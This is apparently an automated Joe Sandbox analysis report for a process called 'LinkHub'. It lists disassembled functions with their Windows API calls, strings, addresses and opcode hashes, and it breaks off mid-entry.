Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: ed6a3ec79ecb448b75cc4d2a482420a86a6460f29c2abaa19128857e92f39ae2
Instruction ID: 56ee7705402a7deee6d46efc47d479253d2dbccf193089558d161082993ed8a0
Opcode Fuzzy Hash: ed6a3ec79ecb448b75cc4d2a482420a86a6460f29c2abaa19128857e92f39ae2
Instruction Fuzzy Hash: 9941A1B1604204DFDB15DF24D884BDA7BB9EF46310B2081A9AC069F205D7B0DA84EBE0

Function 00C44818 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00C448D1
IsMenu.USER32(?), ref: 00C448E6
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00C4492E
DrawMenuBar.USER32 ref: 00C44941

Strings

0, xrefs: 00C44825

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Menu$Item$DrawInfoInsert
String ID: 0
API String ID: 3076010158-4108050209
Opcode ID: ae3acdfcf3a5bac0d862007a4eae6e377c5933136af8d1e8d50996e826c99ad5
Instruction ID: e3c9b0a91f4e16b2c3c4284439c0b731c6e72dae05f32734bb4c72573fcc64f6
Opcode Fuzzy Hash: ae3acdfcf3a5bac0d862007a4eae6e377c5933136af8d1e8d50996e826c99ad5
Instruction Fuzzy Hash: F9415975A00209EFDB14DF51D884FAABBB9FF16324F148129F966A7250D730EE44DB60

Function 00C1272F Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C145FD: GetClassNameW.USER32(?,?,000000FF), ref: 00C14620

SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00C127B3
SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00C127C6
SendMessageW.USER32(?,00000189,?,00000000), ref: 00C127F6

Part of subcall function 00BB8577: _wcslen.LIBCMT ref: 00BB858A

Strings

ListBox, xrefs: 00C12772
ComboBox, xrefs: 00C1273D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$_wcslen$ClassName
String ID: ComboBox$ListBox
API String ID: 2081771294-1403004172
Opcode ID: 07fdbe7ea8bc6c11dda07ba35fd2c5534f08b9226bac4348f33629a72b07fe8f
Instruction ID: 50b5a571204d362383a3e6eeae5e8adffef5f7afd7f586f6e836bc181efade67
Opcode Fuzzy Hash: 07fdbe7ea8bc6c11dda07ba35fd2c5534f08b9226bac4348f33629a72b07fe8f
Instruction Fuzzy Hash: FF21087AA00104BFDB19ABA4DC46DFFB7B8DF47360F104169F422A71E1DB78494AE660

Function 00C439B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78windowlibraryCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00C43A29
LoadLibraryW.KERNEL32(?), ref: 00C43A30
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 00C43A45
DestroyWindow.USER32(?), ref: 00C43A4D

Strings

SysAnimate32, xrefs: 00C43A04

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: MessageSend$DestroyLibraryLoadWindow
String ID: SysAnimate32
API String ID: 3529120543-1011021900
Opcode ID: ba9665ba1c6f2d343e5038d866fa0eaa26c293b16840a12f646151c307fb816e
Instruction ID: 23e00d4a4d2dca6920b20b4d38d8ed42e6007ed384378a40b972afed19cdf40b
Opcode Fuzzy Hash: ba9665ba1c6f2d343e5038d866fa0eaa26c293b16840a12f646151c307fb816e
Instruction Fuzzy Hash: 9E21AC71640249ABEF109FA4DC84FBF77E9FB99364F105228FAA1961E0C771CE50A760

Function 00BD50DD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,00BD508E,00000003,?,00BD502E,00000003,00C798D8,0000000C,00BD5185,00000003,00000002), ref: 00BD50FD
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00BD5110
FreeLibrary.KERNEL32(00000000,?,?,?,00BD508E,00000003,?,00BD502E,00000003,00C798D8,0000000C,00BD5185,00000003,00000002,00000000), ref: 00BD5133

Strings

CorExitProcess, xrefs: 00BD5108
mscoree.dll, xrefs: 00BD50F6

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 406af7176c57eaf8913271bc523bdd03397e532edff79b0abd2a9715d31197ef
Instruction ID: 77b472fc28cf7b451217b66b6afdde29b2f119b40979817d5e90ea6d5bbf0b7f
Opcode Fuzzy Hash: 406af7176c57eaf8913271bc523bdd03397e532edff79b0abd2a9715d31197ef
Instruction Fuzzy Hash: 07F06835A00608BBDB116F94DC49BADBFF5FF08752F0400E5FC06A2260DB755D84CA94

Function 00C0E778 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00C0E785
GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00C0E797
FreeLibrary.KERNEL32(00000000), ref: 00C0E7BD

Strings

X64, xrefs: 00C0E680
GetSystemWow64DirectoryW, xrefs: 00C0E791

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: GetSystemWow64DirectoryW$X64
API String ID: 145871493-2590602151
Opcode ID: 266b98f41d9b14224f91a7cbc7be013246b09689667cdd02d0fb318efe4f964f
Instruction ID: ad7c1c8af8ea5d92907a9f8ff66215d99ecc0a7ada747fe3dea8f3af7bfe1f83
Opcode Fuzzy Hash: 266b98f41d9b14224f91a7cbc7be013246b09689667cdd02d0fb318efe4f964f
Instruction Fuzzy Hash: 1BF0E5B5942525DFD7316B209C88F6D32287F11B01B1409E8FC02F21A0DB30CE48C684

Function 00BB663E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BB668B,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB664A
GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00BB665C
FreeLibrary.KERNEL32(00000000,?,?,00BB668B,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB666E

Strings

kernel32.dll, xrefs: 00BB6642
Wow64DisableWow64FsRedirection, xrefs: 00BB6656

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64DisableWow64FsRedirection$kernel32.dll
API String ID: 145871493-3689287502
Opcode ID: 33889d20e395a741aa37f6c1506fbe2771fb7b49ef3712cbb0006597c652070f
Instruction ID: f10382181d7bc82325a16fd831643f9c4de8413a97d1f9412df0fa18ec055bf6
Opcode Fuzzy Hash: 33889d20e395a741aa37f6c1506fbe2771fb7b49ef3712cbb0006597c652070f
Instruction Fuzzy Hash: 5BE0E63A6015225792153725AC08BFE67A8EF93B66B0501A5FD06D2254DB94CD0185A5

Function 00BB6607 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 22libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32(kernel32.dll,?,?,00BF5657,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB6610
GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00BB6622
FreeLibrary.KERNEL32(00000000,?,?,00BF5657,?,?,00BB62FA,?,00000001,?,?,00000000), ref: 00BB6635

Strings

Wow64RevertWow64FsRedirection, xrefs: 00BB661C
kernel32.dll, xrefs: 00BB6609

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Library$AddressFreeLoadProc
String ID: Wow64RevertWow64FsRedirection$kernel32.dll
API String ID: 145871493-1355242751
Opcode ID: f3ec2c634c38304f6b40da8a617cc4c9d75fbc759a73fb191cfa5598cedd1a42
Instruction ID: 7ad785ab7de913847fca2c114e98e0ad0b0598de37ba43481b21e140f2abeffe
Opcode Fuzzy Hash: f3ec2c634c38304f6b40da8a617cc4c9d75fbc759a73fb191cfa5598cedd1a42
Instruction Fuzzy Hash: B6D0123A61253157422237296C18BDE6B54EE92F6130500A5BC07A2214CFA4CD01CA98

Function 00C23306 Relevance: 7.8, APIs: 5, Instructions: 313fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C235C4
DeleteFileW.KERNEL32(?), ref: 00C23646
CopyFileW.KERNEL32(?,?,00000000,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00C2365C
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C2366D
DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00C2367F

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: File$Delete$Copy
String ID:
API String ID: 3226157194-0
Opcode ID: ba0b4c4a316b48879e836a56bff12c233a53a9699dd1873a8028a0ab398b65b0
Instruction ID: 5fa15c3fdc53e4ce395db7d5423ebd63e464c205acfd583c7b9eff3b17957ebf
Opcode Fuzzy Hash: ba0b4c4a316b48879e836a56bff12c233a53a9699dd1873a8028a0ab398b65b0
Instruction Fuzzy Hash: A2B16F72D01129ABDF11EBA5DC85EEEBBBDEF49310F0040A6F509E6241EB749F448B60

Function 00C3ADE7 Relevance: 7.8, APIs: 5, Instructions: 256COMMON

Download Yara Rule

APIs

GetCurrentProcessId.KERNEL32 ref: 00C3AE87
OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 00C3AE95
GetProcessIoCounters.KERNEL32(00000000,?), ref: 00C3AEC8
CloseHandle.KERNEL32(?), ref: 00C3B09D

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Process$CloseCountersCurrentHandleOpen
String ID:
API String ID: 3488606520-0
Opcode ID: a6c34409d2be2afbe1c60838ad6b6b3a983a25a6b94d8eb95564a0ee9a2393bc
Instruction ID: 12e2a1de7e3be59b60cee7a292856c2df1b0ae15f8d55ef2c6d07c32bf2d2259
Opcode Fuzzy Hash: a6c34409d2be2afbe1c60838ad6b6b3a983a25a6b94d8eb95564a0ee9a2393bc
Instruction Fuzzy Hash: E2A1A3B1A043019FE724DF24C886F6AB7E5AF44710F14885DF5AA9B392D7B1ED40CB81

Function 00C3C429 Relevance: 7.7, APIs: 5, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00BBB329: _wcslen.LIBCMT ref: 00BBB333

Part of subcall function 00C3D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C3C10E,?,?), ref: 00C3D415
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D451
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4C8
Part of subcall function 00C3D3F8: _wcslen.LIBCMT ref: 00C3D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C3C505
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00C3C560
RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00C3C5C3
RegCloseKey.ADVAPI32(?,?), ref: 00C3C606
RegCloseKey.ADVAPI32(00000000), ref: 00C3C613

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpper
String ID:
API String ID: 826366716-0
Opcode ID: 73f8d6a8dbeccc208ca3bc648f7f51ab89ae91b33f0d1e936895cec76883bbda
Instruction ID: 393a4d1fb68084ed15ac67ca862090380a88b38d4158ebc09c287110b333ce52
Opcode Fuzzy Hash: 73f8d6a8dbeccc208ca3bc648f7f51ab89ae91b33f0d1e936895cec76883bbda
Instruction Fuzzy Hash: 33619F31218241AFD714DF24C8D0E6ABBE5FF84308F54859CF09A9B2A2CB71ED46DB91

Function 00C1ED12 Relevance: 7.7, APIs: 5, Instructions: 167filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C1E6F7: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C1D7CD,?), ref: 00C1E714

Part of subcall function 00C1E6F7: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C1D7CD,?), ref: 00C1E72D

Part of subcall function 00C1EAB0: GetFileAttributesW.KERNEL32(?,00C1D840), ref: 00C1EAB1

lstrcmpiW.KERNEL32(?,?), ref: 00C1ED8A
MoveFileW.KERNEL32(?,?), ref: 00C1EDC3
_wcslen.LIBCMT ref: 00C1EF02
_wcslen.LIBCMT ref: 00C1EF1A
SHFileOperationW.SHELL32(?,?,?,?,?,?), ref: 00C1EF67

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: File$FullNamePath_wcslen$AttributesMoveOperationlstrcmpi
String ID:
API String ID: 3183298772-0
Opcode ID: f349ad04368a9584a48c87b97778f903c3432b468ce6937e73e40314e4b6f090
Instruction ID: 25a572b2d5467290983053a36384a8b622b1f8e21c5e97fd08e57814f1dae6c0
Opcode Fuzzy Hash: f349ad04368a9584a48c87b97778f903c3432b468ce6937e73e40314e4b6f090
Instruction Fuzzy Hash: 0A5174B25083849BC724EBA0D891DDBB3ECEF85310F40092EF595D3191EF71A6C89756

Function 00C19517 Relevance: 7.7, APIs: 5, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00C19534
VariantClear.OLEAUT32 ref: 00C195A5
VariantClear.OLEAUT32 ref: 00C19604
VariantClear.OLEAUT32(?), ref: 00C19677
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00C196A2

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType
String ID:
API String ID: 4136290138-0
Opcode ID: 173d883b7b44d2898d038793134cbb320c70540c99933c76acb4f374288b2971
Instruction ID: f24e7853ffce9603bb2c7f36fc7c9a70bc759af5bc6d11f26b5a39f24746aa08
Opcode Fuzzy Hash: 173d883b7b44d2898d038793134cbb320c70540c99933c76acb4f374288b2971
Instruction Fuzzy Hash: 655159B5A00219EFCB14CF58C894AAAB7F8FF89314B058559F91ADB310E730E951CFA0

Function 00C29540 Relevance: 7.6, APIs: 5, Instructions: 143COMMON

Download Yara Rule

APIs

GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00C295F3
GetPrivateProfileSectionW.KERNEL32(?,00000003,00000003,?), ref: 00C2961F
WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00C29677
WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00C2969C
WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00C296A4

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: PrivateProfile$SectionWrite$String
String ID:
API String ID: 2832842796-0
Opcode ID: 738888bc87ac7884cfb0fb7865d450d276aaaabafb069fd43c78a40e7c87f7ea
Instruction ID: 9e05453c7e88376f13e688d3b6fc84064b8065c3793b83a5f72093c871d5c0fb
Opcode Fuzzy Hash: 738888bc87ac7884cfb0fb7865d450d276aaaabafb069fd43c78a40e7c87f7ea
Instruction Fuzzy Hash: 83510935A00215AFCB15DF65C881AAEBBF5FF49314F048098E85AAB362DB75ED41CF90

Function 00C39941 Relevance: 7.6, APIs: 5, Instructions: 143libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(?,00000000,?), ref: 00C3999D
GetProcAddress.KERNEL32(00000000,?), ref: 00C39A2D
GetProcAddress.KERNEL32(00000000,00000000), ref: 00C39A49
GetProcAddress.KERNEL32(00000000,?), ref: 00C39A8F
FreeLibrary.KERNEL32(00000000), ref: 00C39AAF

Part of subcall function 00BCF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,00000000,?,?,?,00C21A02,?,753CE610), ref: 00BCF9F1
Part of subcall function 00BCF9D4: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00C10354,00000000,00000000,?,?,00C21A02,?,753CE610,?,00C10354), ref: 00BCFA18

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad
String ID:
API String ID: 666041331-0
Opcode ID: 24de23087cbe3affdaed06e9dc228eeba2fe88466bd7a071159d32ce5ed2f840
Instruction ID: 0d60481e1fec948444780042cb5480fa4dff8f9f1539a78f979f69304bfd7423
Opcode Fuzzy Hash: 24de23087cbe3affdaed06e9dc228eeba2fe88466bd7a071159d32ce5ed2f840
Instruction Fuzzy Hash: 70513935A042059FCB01EF68C484DADBBF0FF09314B0481A8E85A9B362D7B1EE85CB91

Function 00C475AE Relevance: 7.6, APIs: 5, Instructions: 131windowCOMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(00000002,000000F0,?), ref: 00C4766B
SetWindowLongW.USER32(?,000000EC,?), ref: 00C47682
SendMessageW.USER32(00000002,00001036,00000000,?), ref: 00C476AB
ShowWindow.USER32(00000002,00000000,00000002,00000002,?,?,?,?,?,?,?,00C2B5BE,00000000,00000000), ref: 00C476D0
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000027,00000002,?,00000001,00000002,00000002,?,?,?), ref: 00C476FF

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C4D000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087788664.0000000000C73000.00000002.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087842282.0000000000C7D000.00000004.00000001.01000000.00000011.sdmpDownload File
Associated: 00000026.00000002.2087865393.0000000000C85000.00000002.00000001.01000000.00000011.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_38_2_bb0000_LinkHub.jbxd

Similarity

API ID: Window$Long$MessageSendShow
String ID:
API String ID: 3688381893-0
Opcode ID: 6096abf0e8e745a8c932ef3ceddc5d85c1fc317b4a0159acbb2cb7575ab2094b
Instruction ID: d6cb6f9adc559e028748678b0786547b230bd42d75ee9deaddb0dfbbc19feef6
Opcode Fuzzy Hash: 6096abf0e8e745a8c932ef3ceddc5d85c1fc317b4a0159acbb2cb7575ab2094b
Instruction Fuzzy Hash: 1341E235A08504AFD725DF2CCC48FE97BA6FB0A360F160364F829A72E0C770AE10DA50

Function 00BE23C1 Relevance: 7.6, APIs: 5, Instructions: 129COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00BE2433
_free.LIBCMT ref: 00BE2453

Memory Dump Source

Source File: 00000026.00000002.2087719026.0000000000BB1000.00000020.00000001.01000000.00000011.sdmp, Offset: 00BB0000, based on PE: true

Associated: 00000026.00000002.2087697932.0000000000BB0000.00000002.00000001.01000000.00000011.sdmpDownload File
